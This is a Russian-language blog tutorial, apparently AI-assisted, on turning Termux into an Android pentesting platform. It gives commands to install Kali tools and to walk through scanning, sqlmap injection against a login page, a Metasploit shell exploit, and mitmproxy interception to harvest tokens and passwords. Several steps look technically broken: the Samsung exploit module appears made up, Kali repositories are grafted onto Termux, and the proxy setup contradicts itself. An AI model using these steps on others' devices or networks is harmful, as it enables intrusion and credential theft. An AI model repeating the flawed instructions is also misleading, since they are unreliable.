We detected you are likely not from a Russian-speaking region. Would you like to switch to the international version of the site?

  Назад к списку статей
Termux

Пентестинг Android‑устройств из Termux: инструменты, настройка и практические примеры

29 янв 2026 в 17:30 Усачёв Денис Евгеньевич

Подробный гид по пентестингу Android‑устройств в Termux: установка, настройка репозиториев, обзор основных инструментов и реальные примеры атак.

Termux – это терминальное приложение для Android, которое предоставляет полноценную Linux‑среду без необходимости рут‑прав. Благодаря пакетному менеджеру pkg и поддержке репозиториев Kali Nethunter, Termux становится удобной платформой для мобильного пентеста. В этой статье мы разберём, как подготовить Termux к работе, какие инструменты установить и покажем практические примеры атак на Android‑устройства.

Установка Termux и базовая настройка

Перед началом убедитесь, что у вас установлена последняя версия Termux из F‑Droid. После установки выполните базовую подготовку:

pkg update && pkg upgrade -y
pkg install curl wget git gnupg -y

Для комфортной работы рекомендуется установить zsh и oh‑my‑zsh:

pkg install zsh -y
chsh -s zsh
curl -Lo install.sh https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh
sh install.sh

Подключение репозитория Kali Nethunter

Kali Nethunter предоставляет более 600 инструментов, которые можно установить непосредственно в Termux. Добавляем репозиторий и импортируем ключи:

echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > $PREFIX/etc/apt/sources.list.d/kali.list
curl -fsSL https://archive.kali.org/kali-archive-keyring.gpg | apt-key add -
apt update

После обновления вы сможете устанавливать любые пакеты из Kali:

apt install metasploit-framework nmap sqlmap netcat -y

Основные инструменты для пентеста Android

  • Nmap – сканер сетей и портов.
  • Netcat – «универсальный нож» для работы с сокетами.
  • Metasploit Framework – платформа для эксплуатации уязвимостей.
  • sqlmap – автоматизированный инструмент для обнаружения SQL‑инъекций.
  • mitmproxy – интерактивный прокси‑сервер для перехвата трафика.
  • apktool – декомпиляция и модификация APK‑файлов.

Все перечисленные пакеты уже доступны через репозиторий Kali, но некоторые из них могут требовать дополнительных зависимостей. Например, для metasploit-framework потребуется установить Ruby:

pkg install ruby -y
gem install bundler
bundle install

Практический пример 1: Сканирование локальной сети

Для начала определим IP‑адрес устройства и подсеть:

ip addr show wlan0

Допустим, наш IP – 192.168.1.42/24. Сканируем сеть командой Nmap:

nmap -sn 192.168.1.0/24

Результат покажет активные хосты, их MAC‑адреса и, при наличии, открытые порты.

Практический пример 2: Поиск уязвимых веб‑приложений

Предположим, в сети найден веб‑сервер с IP 192.168.1.101. Запустим sqlmap для проверки параметров URL:

sqlmap -u "http://192.168.1.101/login.php?user=admin" --batch --risk=3 --level=5

Опция --batch автоматизирует ответы, а --risk и --level задают глубину тестирования. Если уязвимость обнаружена, sqlmap предложит методы эксплуатации.

Практический пример 3: Эксплуатация через Metasploit

Допустим, на целевом устройстве обнаружена уязвимость android/local_exploit_samsung. Запускаем Metasploit:

msfconsole

Внутри консоли вводим:

use exploit/android/local/exploit_samsung
set TARGET 0
set SESSION 1
set LHOST ваш_IP
exploit

Если эксплойт успешен, вы получите доступ к shell на целевом устройстве.

Практический пример 4: Перехват трафика с mitmproxy

Для анализа сетевого трафика включаем режим «Wi‑Fi hotspot» на Android‑устройстве и подключаем к нему целевой телефон. Запускаем прокси:

mitmproxy -p 8080 --mode transparent

На целевом устройстве в настройках Wi‑Fi указываем прокси 192.168.1.42:8080. Теперь весь HTTP/HTTPS‑трафик будет виден в консоли mitmproxy, где можно искать токены, пароли и другие чувствительные данные.

Советы по безопасности и ограничениям Termux

  • Для большинства атак требуется root‑доступ. Без рута некоторые функции (например, изменение IP‑таблиц) будут недоступны.
  • Всегда используйте отдельный тестовый Android‑устройство или эмулятор, чтобы избежать нарушения закона.
  • Обновляйте пакеты регулярно: pkg update && pkg upgrade -y и apt update && apt upgrade -y.
  • Для более тяжёлых задач (например, генерация payload‑ов) удобно подключать Termux к внешнему серверу через ssh и использовать мощные ПК в качестве «бэкенда».

Заключение

Termux предоставляет гибкую и мобильную платформу для проведения пентестинга Android‑устройств. С помощью репозитория Kali Nethunter вы получаете доступ к сотням проверенных инструментов, а возможности Linux‑окружения позволяют выполнять сложные сценарии прямо на смартфоне. Если вам требуется более глубокий аудит, настройка CI/CD для автоматических сканирований или обучение персонала, команда RybinskLab готова помочь. Мы предоставляем услуги по комплексному тестированию мобильных приложений, настройке безопасных Android‑инфраструктур и проведению обучающих воркшопов.

* Текст статьи подготовлен и структурирован с использованием технологий искусственного интеллекта. Проверен и доработан перед публикацией.

Нужна помощь с настройкой Termux, Linux и серверов?

Я оказываю ИТ-услуги: настройка серверов, автоматизация, безопасность, помощь с Linux и инфраструктурой. Материалы сайта — только в ознакомительных и образовательных целях.

Связаться со мной
Поддержать проект